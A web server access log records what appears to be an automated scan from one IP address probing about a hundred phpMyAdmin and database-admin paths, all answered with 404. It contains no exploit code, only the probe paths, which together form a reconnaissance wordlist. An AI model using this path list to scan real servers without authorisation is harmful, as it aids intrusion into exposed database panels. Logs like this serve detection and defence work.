141.164.58.230 - - [02/Oct/2024:00:45:46 +0200] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:47 +0200] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:47 +0200] "GET /administrator/admin/index.php?lang=en HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:48 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:48 +0200] "GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:48 +0200] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:48 +0200] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:49 +0200] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:49 +0200] "GET /phpmyadmin_/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:49 +0200] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:49 +0200] "GET /mysqladmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:50 +0200] "GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:50 +0200] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:51 +0200] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:51 +0200] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:51 +0200] "GET /phpMyAdmin-latest/index.php?lang=en HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:51 +0200] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:52 +0200] "GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:52 +0200] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:52 +0200] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:52 +0200] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:53 +0200] "GET /phpMyAdmin6.0/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:53 +0200] "GET /__phpmyadmin/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:54 +0200] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:54 +0200] "GET /phpMyAdmin-5.2.0-all-languages/index.php?lang=en HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:54 +0200] "GET /php-myadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:54 +0200] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:55 +0200] "GET /pma/index.php?lang=en HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:55 +0200] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:55 +0200] "GET /admin/db/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:55 +0200] "GET /phpmyadmin2022/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:56 +0200] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:56 +0200] "GET /administrator/db/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:57 +0200] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:57 +0200] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:57 +0200] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:57 +0200] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:58 +0200] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:58 +0200] "GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:58 +0200] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:58 +0200] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:59 +0200] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:45:59 +0200] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:00 +0200] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:00 +0200] "GET /db/dbadmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:00 +0200] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:00 +0200] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:01 +0200] "GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:01 +0200] "GET /admin/sysadmin/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:01 +0200] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:02 +0200] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:02 +0200] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:02 +0200] "GET /sql/sql/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:03 +0200] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:03 +0200] "GET /admin/index.php?lang=en HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:03 +0200] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:03 +0200] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:04 +0200] "GET /phpMyAdmin_/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:04 +0200] "GET /phpMyAdmin6/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:04 +0200] "GET /phpMyAdmin-latest-all-languages/index.php?lang=en HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:05 +0200] "GET /phpMyAdmin-5.2.1-english/index.php?lang=en HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:05 +0200] "GET /admin/sysadmin/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:05 +0200] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:06 +0200] "GET /phpmyadmin2019/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:06 +0200] "GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:06 +0200] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:06 +0200] "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:07 +0200] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:07 +0200] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:07 +0200] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:08 +0200] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:08 +0200] "GET /phpmyAdmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:08 +0200] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:09 +0200] "GET /mysqladmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:09 +0200] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:09 +0200] "GET /phpmy-admin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:09 +0200] "GET /phpMyAdmin-latest-all-languages/index.php?lang=en HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:10 +0200] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:11 +0200] "GET /phppma/index.php?lang=en HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:11 +0200] "GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:12 +0200] "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:12 +0200] "GET /index.php?lang=en HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:13 +0200] "GET /pma/index.php?lang=en HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:14 +0200] "GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:14 +0200] "GET /admin/web/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:15 +0200] "GET /mysql/index.php?lang=en HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:15 +0200] "GET /admin/pma/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:16 +0200] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:17 +0200] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:17 +0200] "GET /db/index.php?lang=en HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:18 +0200] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:18 +0200] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:19 +0200] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:20 +0200] "GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:20 +0200] "GET /phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:21 +0200] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:21 +0200] "GET /database/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:22 +0200] "GET /_phpmyadmin_/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:23 +0200] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:23 +0200] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:24 +0200] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:24 +0200] "GET /mysql-admin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:25 +0200] "GET /phpmyadmin6/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:26 +0200] "GET /phpMyAdmin-5.2.1/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
